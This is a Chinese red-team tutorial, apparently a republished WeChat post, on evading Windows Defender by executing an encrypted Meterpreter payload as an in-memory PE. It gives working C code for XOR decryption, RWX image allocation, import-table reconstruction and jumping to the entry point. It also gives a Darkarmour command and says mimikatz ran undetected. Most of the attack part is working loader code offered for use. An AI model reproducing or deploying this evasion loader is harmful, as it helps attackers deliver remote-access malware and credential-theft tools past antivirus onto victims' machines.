前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >红队技巧--通过内存中PE执行绕过AV

红队技巧--通过内存中PE执行绕过AV

作者头像
鸿鹄实验室
发布2021-04-15 13:12:33
7390
发布2021-04-15 13:12:33
举报
文章被收录于专栏:鸿鹄实验室

今天在国外看到的一个比较不错BypassAV的方法,遂分享给大家。

payload选择metasploits的windows/x64/meterpreter_reverse_https,测试AV为Windows Defender,比如以下面的文件为例进行测试。

然后就会被Windows Defender检测到,并可以通过时间查看器查看

然后我们就可以发现,我们被“HackTool:Win64/Meterpreter.A!dll”所拦截。很明显我们不能在磁盘中运行恶意文件获取会话,那么我们选择以内存的方式运行文件。

具体思路:

  • 加密恶意软件并将其存储在内存中
  • 解析DOS标头&
  • 重新创建导入地址表
  • 获取并跳转到新的入口点

加密方式我们选择多层的XOR,下面是对代码进行加密的代码:

代码语言:javascript
复制
  for (i = 0; i < array_len; i++) {
      decrypted_bytes[i] = keys ^ image_crypt[i];
      image_crypt[i] = '\\0';
  }
  
  // repeat this for each key
  for (i = 0; i < array_len; i++) {
      decrypted_bytes[i] = key%s ^ decrypted_bytes[i];
  }

解析DOS标头时,需要一些重要的结构

  • PIMAGE_DOS_HEADER

要检查恶意软件中的魔术字节,只需确保我们可以实际执行它即可。

  • PIMAGE_NT_HEADERS

用于检查恶意软件的PE签名(再次确保其有效),并使用该OptionalHeader值使我们能够访问IMAGE_OPTIONAL_HEADER结构

  • IMAGE_OPTIONAL_HEADER

在获取图像基本和入口点地址的同时,还要获取图像和标题的整体大小。然后,这将允许使用分配正确的内存量。

  • PIMAGE_SECTION_HEADER

允许我们访问每个部分的地址,大小和数据,以便将其复制到上面分配的空间中。

下面是我们将用来完成所有这些操作的代码

代码语言:javascript
复制
LPVOID AllocateImage(LPVOID base_addr) {
      LPVOID mem_image_base = NULL;
      PIMAGE_DOS_HEADER raw_image_base = (PIMAGE_DOS_HEADER)base_addr;

      if (IMAGE_DOS_SIGNATURE != raw_image_base->e_magic)
      {
          return NULL;
      }

      PIMAGE_NT_HEADERS nt_header = (PIMAGE_NT_HEADERS)(raw_image_base->e_lfanew + (UINT_PTR)raw_image_base);
      if (IMAGE_NT_SIGNATURE != nt_header->Signature)
      {
          return NULL;
      }

      PIMAGE_SECTION_HEADER section_header = (PIMAGE_SECTION_HEADER)(raw_image_base->e_lfanew + sizeof(*nt_header) + (UINT_PTR)raw_image_base);

      mem_image_base = VirtualAlloc((LPVOID)(nt_header->OptionalHeader.ImageBase), nt_header->OptionalHeader.SizeOfImage , MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

      if (NULL == mem_image_base)
      {
          mem_image_base = VirtualAlloc(NULL, nt_header->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
      }

      if (NULL == mem_image_base)
      {
          return NULL;
      }

      memcpy(mem_image_base, (LPVOID)raw_image_base, nt_header->OptionalHeader.SizeOfHeaders);

      for (int i = 0; i < nt_header->FileHeader.NumberOfSections; i++)
      {
          memcpy((LPVOID)(section_header->VirtualAddress + (UINT_PTR)mem_image_base), (LPVOID)(section_header->PointerToRawData + (UINT_PTR)raw_image_base), section_header->SizeOfRawData);
       section_header++;
      }
      
      return mem_image_base;
}

重新创建导入地址表

这次我们需要的重要结构是

  • IMAGE_OPTIONAL_HEADER

我们将使用它来获取IAT(导入地址表)的地址和大小。一旦获得地址,我们将使用它VirtualProtect来将其权限更改为,PAGE_READWRITE以便进行下一步。

  • PIMAGE_IMPORT_DESCRIPTOR

这用于访问包含导入地址表(用于查找DLL的内存地址的查询表,当调用其他库中的函数时可以使用的信息)信息的结构。我们将使用它来获取名称。恶意软件使用的DLL并使用该LoadLibraryA功能加载它们。将DLL加载到我们自己的地址空间后,我们需要遍历并使用它GetProcAddress来获取恶意软件所需功能的正确新地址,并在IAT中添加对其的引用。

  • PIMAGE_THUNK_DATA

这将为我们提供被恶意软件调用的每个函数的名称,一旦有了这些名称,我们就可以使用GetProcAddress它们从它们所在的DLL中获取地址,然后将正确的新地址添加到IAT中。

  • PIMAGE_IMPORT_BY_NAME

允许我们从地址获取函数名称

然后将所有这些放在一起...

代码语言:javascript
复制
VOID ReCreateIAT( PIMAGE_DOS_HEADER dos_header, PIMAGE_NT_HEADERS nt_header)
{
    DWORD op;
    DWORD iat_rva;
    SIZE_T iat_size;
    HMODULE import_base;
    PIMAGE_THUNK_DATA thunk;
    PIMAGE_THUNK_DATA fixup;

    PIMAGE_IMPORT_DESCRIPTOR import_table = (PIMAGE_IMPORT_DESCRIPTOR)(nt_header->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress + (UINT_PTR)dos_header);

    DWORD iat_loc = (nt_header->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IAT].VirtualAddress) ? IMAGE_DIRECTORY_ENTRY_IAT : IMAGE_DIRECTORY_ENTRY_IMPORT;

    iat_rva = nt_header->OptionalHeader.DataDirectory[iat_loc].VirtualAddress;
    iat_size = nt_header->OptionalHeader.DataDirectory[iat_loc].Size;

    LPVOID iat = (LPVOID)(iat_rva + (UINT_PTR)dos_header);
    VirtualProtect(iat, iat_size, PAGE_READWRITE, &op);
    while (import_table->Name) {
        import_base = LoadLibraryA((LPCSTR)(import_table->Name + (UINT_PTR)dos_header));
        fixup = (PIMAGE_THUNK_DATA)(import_table->FirstThunk + (UINT_PTR)dos_header);
        if (import_table->OriginalFirstThunk) {
            thunk = (PIMAGE_THUNK_DATA)(import_table->OriginalFirstThunk + (UINT_PTR)dos_header);
        } else {
            thunk = (PIMAGE_THUNK_DATA)(import_table->FirstThunk + (UINT_PTR)dos_header);
        }

        while (thunk->u1.Function) {
            PCHAR func_name;
            if (thunk->u1.Ordinal & IMAGE_ORDINAL_FLAG64) {
                fixup->u1.Function =
                    (UINT_PTR)GetProcAddress(import_base, (LPCSTR)(thunk->u1.Ordinal & 0xFFFF));

            } else {
                func_name = (PCHAR)(((PIMAGE_IMPORT_BY_NAME)(thunk->u1.AddressOfData))->Name + (UINT_PTR)dos_header);
                fixup->u1.Function = (UINT_PTR)GetProcAddress(import_base, func_name);
            }
            fixup++;
            thunk++;
        }
        import_table++;
    }
    return;
}

将所有PE都设置在内存中,就可以执行它了!

我们可以使用AddressOfEntryPoint结构IMAGE_OPTIONAL_HEADER 的成员来获取入口点。这将为我们提供相对于图像基址的入口点,因此,为了获得正确的地址,我们需要将其添加到基址(将从其他函数返回AllocateImage)。如下所示

代码语言:javascript
复制
LPVOID EntryPoint = (LPVOID)(nt_header->OptionalHeader.AddressOfEntryPoint + (UINT_PTR)image_base);

现在我们有了切入点,我们可以使用

代码语言:javascript
复制
((void(*)())(EntryPoint))();

作者最后将所有的功能打包成了一个工具--Darkarmour,我们可以使用该工具进行上述操作,工具地址在文末。

比如执行以下操作:

代码语言:javascript
复制
./darkarmour.py -f meter.exe -j -l 5 -e xor -o darkmeter.exe

执行,并绕过了杀软

我们也尝试执行mimikatz

是的,也可以运行它:)

写在后面:

行为分析是杀软常见的检测恶意文件的方法,但它是执行后才会被检测的,这意味着绕过它的唯一方法是更改恶意软件的实际行为。

原文地址:

代码语言:javascript
复制
https://blog.dylan.codes/bypassing-av-via/

工具地址:

代码语言:javascript
复制
https://git.dylan.codes/batman/darkarmour
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-01-11,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 鸿鹄实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档